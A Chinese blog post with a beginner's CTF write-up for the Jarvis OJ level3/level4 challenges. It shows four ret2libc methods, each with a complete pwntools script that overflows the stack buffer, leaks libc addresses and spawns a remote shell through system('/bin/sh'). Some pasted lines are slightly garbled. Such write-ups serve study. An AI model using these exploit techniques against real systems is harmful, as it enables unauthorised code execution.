jarvis oj level3/level4--多种解法实现ret2libc

最新推荐文章于 2024-02-20 08:15:00 发布
最新推荐文章于 2024-02-20 08:15:00 发布
阅读量797 收藏 3
点赞数 3
分类专栏: 汇编与逆向 学习笔记 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zpy1998zpy/article/details/89143058
版权

level3和level4都是ret2libc的典型题目,只不过level3给了libc文件而level4没有给。

这里以leve3为例,使用多种方式实现ret2libc

一,使用给定的libc文件,计算偏移地址

整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行

基础原理: http://www.zjzhhb.com/archives/641 ,

利用思路:由程序文件获得write在plt表中的地址,可以理解为write的入口地址
由程序文件获得write在got表中的地址,此处存放着write实际运行时的地址
payload1跳转到write函数执行(plt地址),泄露write函数运行时在内存中的地址,并跳回vulnerable函数。
通过给定的libc库算出system函数和字符串’/bin/sh’的实际地址
payload2构造system(‘/bin/sh’)

这里不再介绍了,附上脚本:

from pwn import *
 context(log_level = "debug",arch = "i386",os = "linux")
 elf=ELF('/home/zpy/Desktop/javaoj/level3/level3')
 libc=ELF('/home/zpy/Desktop/javaoj/level3/libc-2.19.so')
 ip = 'pwn2.jarvisoj.com'
 port = 9879
 io = remote(ip, port)

 write_addr = elf.symbols['write']      # pltadress
 vulner_addr = elf.symbols['vulnerable_function']
 write_got = elf.got['write']

 padding='a'0x88+'a'0x4
 payload1=padding + p32(write_addr) + p32(vulner_addr) + p32(1) + p32(write_got) + p32(4)
 print io.recv()
 io.send(payload1)
 write_absoult = u32(io.recv(4))

 system_lib = libc.symbols['system']
 write_lib = libc.symbols['write']
 bin_lib = libc.search('/bin/sh').next()
 system_absoult = write_absoult + system_lib - write_lib
 bin_absoult = write_absoult + bin_lib-write_lib

 payload2 = padding + p32(system_absoult) + p32(0) + p32(bin_absoult)
 io.recv()
 io.sendline(payload2)
 io.interactive()

二,使用DynELF泄露system地址,无需libc文件

DynELF是pwntools的一个函数,可以循环利用程序中可以泄露地址的函数(这里是write),将libc中的函数的实际地址泄露出来,并且无需libc文件。

关于DynELF:

https://github.com/firmianay/CTF-All-In-One/blob/master/doc/4.8_dynelf.md

https://www.anquanke.com/post/id/85129

https://www.freebuf.com/articles/system/193646.html

但是好像不能泄露字符串’/bin/sh’的地址,不过我们可以构造read(0,bss_addr,0x8)读入我们输入的’/bin/sh’,写入到bss段,再通过提供给system函数使用。

利用思路:无需libc库文件
由程序文件获得write的plt地址,获得read函数的plt地址,获得write函数的got地址,start函数的地址,获得bss程序段的起始地址
由DynELF和write函数泄露出system函数的地址
payload2:调用read函数,标准输入将字符串’/bin/sh’读入bss数据段
payload3:调用system函数,bss段中的’/bin/sh’的地址作为system函数的参数,执行 system(‘/bin/sh’)

编写leak函数的时候要注意接收’Input:\n’,这里和level4有点差别

from pwn import *
 ip = 'pwn2.jarvisoj.com'
 port = 9879
 io = remote(ip, port)
 elf=ELF('/home/zpy/Desktop/javaoj/level3/level3')

 write_addr = elf.symbols['write']
 vulner_addr = elf.symbols['vulnerable_function']
 write_got = elf.got['write']
 start = elf.symbols['_start']    # 循环泄露地址时,最好使用start函数作为每次跳转回的位置,不易出错
 read_plt = elf.symbols['read']
 bss_addr = elf.bss()

 padding = 'a' * 0x88 + 'a' * 0x4


 def leak(address):
     payload = padding + p32(write_addr) + p32(start) + p32(1) + p32(address) + p32(4)
     io.recvuntil('Input:\n')
     io.send(payload)
     data = io.recv(4)
     return data

 d = DynELF(leak, elf=ELF('/home/zpy/Desktop/javaoj/level3/level3'))
 systemAddress = d.lookup('system', 'libc')

 payload2 = padding + p32(read_plt) + p32(vulner_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
 io.send(payload2)
 io.send('/bin/sh\x00')

 payload3 = padding + p32(systemAddress)  + p32(0) + p32(bss_addr)
 io.sendline(payload3)
 io.interactive()

三,使用LibcSearcher确定链接的libc文件版本,得到偏移量

LibcSearcher是python的一个库,可以通过已泄露的函数地址算出改程序使用的libc文件是哪个。当我们知道了程序中链接的libc文件是什么,就可像方法一一样计算实际地址了。

利用思路:与方法一类似,但是也不需要给出libc文件
首先泄露出write函数运行时的实际地址
通过LibcSearcher,确定libc文件的版本,算出system函数和字符串’/bin/sh’的实际地址

只提供一个泄露的地址和对应函数名,可能搜索到多个符合结果的libc,都进行尝试即可。

关于LibcSearcher:

https://github.com/lieanu/LibcSearcher

https://blog.csdn.net/kevin66654/article/details/87282411

https://www.jianshu.com/p/8d2552b8e1a2

https://libc.blukat.me/

from pwn import *
 from LibcSearcher import *

 elf=ELF('/home/zpy/Desktop/javaoj/level3/level3')
 ip = 'pwn2.jarvisoj.com'
 port = 9879
 io = remote(ip, port)

 write_addr = elf.symbols['write']
 vulner_addr = elf.symbols['vulnerable_function']
 write_got = elf.got['write']

 padding='a'0x88+'a'0x4

 payload1=padding + p32(write_addr) + p32(vulner_addr) + p32(1) + p32(write_got) + p32(4)
 io.recv()
 io.send(payload1)
 write_absoult = u32(io.recv(4))

 obj = LibcSearcher("write", write_absoult)

 system_lib = obj.dump("system")
 bin_lib = obj.dump("str_bin_sh")
 write_lib = obj.dump("write")

 system_absoult = write_absoult + system_lib - write_lib
 bin_absoult = write_absoult + bin_lib - write_lib

 payload2 = padding + p32(system_absoult) + p32(0) + p32(bin_absoult)
 io.recv()
 io.sendline(payload2)
 io.interactive()

四,使用ppp_ret跳转对方法二进行改进

方法二中,使用了三个payload,其中payload2调用read函数读入’/bin/sh’,payload3调用system函数执行,现在我们考虑将payload2和payload3合并

但是直接合并是有问题的,如果我们构造一个payload,直接两个函数的栈帧压入,执行完read函数后的栈并不满足system函数的执行,还需要pop三次

所以新的思路是执行完read函数后,跳转到程序的某处,存在指令 pop … pop … pop … ret,在这里执行完三次pop,平衡栈结构后,再执行跳转指令,跳转到system函数执行

在程序中找到一处 pop … pop … pop … ret 需要借助工具ROPgadget

有关ROPgadget:

https://www.jianshu.com/p/1d7f0c56a323

https://github.com/JonathanSalwan/ROPgadget

使用该工具查找包含pop和ret指令的地址:

0x08048519符合三个pop一个ret的要求,执行完read函数跳转到这里执行三个pop再跳转system就行了,脚本:

from pwn import *
 ip = 'pwn2.jarvisoj.com'
 port = 9879
 io = remote(ip, port)
 elf=ELF('/home/zpy/Desktop/javaoj/level3/level3')

 write_addr = elf.symbols['write']
 vulner_addr = elf.symbols['vulnerable_function']
 write_got = elf.got['write']
 start = elf.symbols['_start']
 read_plt=elf.symbols['read']
 bss_addr=elf.bss()

 padding = 'a' * 0x88 + 'a' * 0x4

 def leak(address):
     payload = padding + p32(write_addr) + p32(start) + p32(1) + p32(address) + p32(4)
     io.recvuntil('Input:\n')
     io.send(payload)
     data = io.recv(4)
     return data


 d = DynELF(leak, elf=ELF('/home/zpy/Desktop/javaoj/level3/level3'))
 systemAddress = d.lookup('system', 'libc')

 ppp_ret = 0x08048519

 payload2 = padding + p32(read_plt) + p32(ppp_ret) + p32(0x0) + p32(bss_addr) + p32(0x8)+ p32(systemAddress) + p32(0) + p32(bss_addr)

 io.send(payload2)
 io.send('/bin/sh\x00')
 io.interactive()

刚入门pwn,都是些很基础的东西,记录一下学习笔记,也希望对大家有些用处!

参考链接:

http://abcdefghijklmnopqrst.xyz/2018/08/13/WP_JarvisOJ/#XMAN-level3

https://xz.aliyun.com/t/3402#toc-0

https://blog.csdn.net/weixin_41617275/article/details/84799355

文章同步到我的博客:http://www.zjzhhb.com/archives/654

A1ienX
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Jarvis OJ--level3
Kni9hT's Blog
11-10 249
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
从零开始做题:逆向 ret2libc jarvisoj level1
weixin_44626085的博客
02-15 1305
pl ='a' * (0x88 + 0x4 ) + p32(write_plt) + p32(main_addr) +p32(0x1)+p32(write_got)+p32(0x4) # 栈迁移过来后 执行write函数 write后返回main函数 write的三个参数。libc=LibcSearcher('write',write_addr) #根据泄漏的write地址,用LibcSearcher可以找到对应的libc版本,然后找到对应的write函数地址。基本全关,栈可执行。
Jarvis Oj Pwn 学习笔记-level3
baoan4763的博客
05-31 155
你们期待的Libc终于来了~(return_to_libc attack) 跪呈链接: https://files.cnblogs.com/files/Magpie/level3.rar nc pwn2.jarvisoj.com 9879 checksec,依旧老样子: 端起IDA,elf和libc双双扔进锅里: 先看elf: 阔以阔以,libc类题目该有的函数(话...
jarvis oj level3
CNXBDSa的博客
07-27 398
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
jarvisoj_level3
m0_52231248的博客
11-17 658
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有write和read的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
Jarvis OJ - [XMAN]level3 - Writeup——ret2libc尝试
aoque9909的博客
11-26 179
这次除了elf程序还附带一个动态链接库 先看一下,很一般的保护 思路分析 在ida中查看,可以确定通过read函数输入buf进行溢出,但是并没有看到合适的目标函数 但是用ida打开附带的链接库,可以看到system函数和“/bin/sh”字符串都存在 于是思路就确定为read函数溢出->system函数,同时加入参数“/bin/sh” 通过libc...
从零开始学逆向:理解ret2libc-3
最新发布
weixin_44626085的博客
02-20 1502
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 481
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 529
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
从零开始学逆向:理解ret2libc-1
weixin_44626085的博客
02-19 1525
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。
Jarvis OJ Level4
qq_39153421的博客
09-19 435
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1254
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 806
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
jarvisoj_level3_x64
m0sway的博客
11-26 597
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
Jarvis oj level3
发蝴蝶和大脑斧的博客
12-04 1136
下载下来发现有level3文件和libc.so文件,先checksec,和level2差不多,接着ida打开level3,没找到system函数和bin字符串,没什么办法了。接着去看so文件,libc是Linux下的ANSI C的函数库。找到了system函数和bin字符串。那么怎么利用呢? 首先了解plt和got表。链接 我是这么理解的:plt表中存放的是函数在got表中该项的地址,got表存放...
Jarvis OJ-level3
weixin_30332241的博客
05-15 95
使用ret2libc攻击方法绕过数据执行保护 from pwn import* conn = remote("pwn2.jarvisoj.com",9879) elf = ELF('level3') libc = ELF('libc-2.19.so') plt_write = elf.symbols['write'] #0804834 print 'plt_write =...
jarvisoj level3
sun的博客
10-03 1041
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 162
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 471
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出...
jarvisoj_level2
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值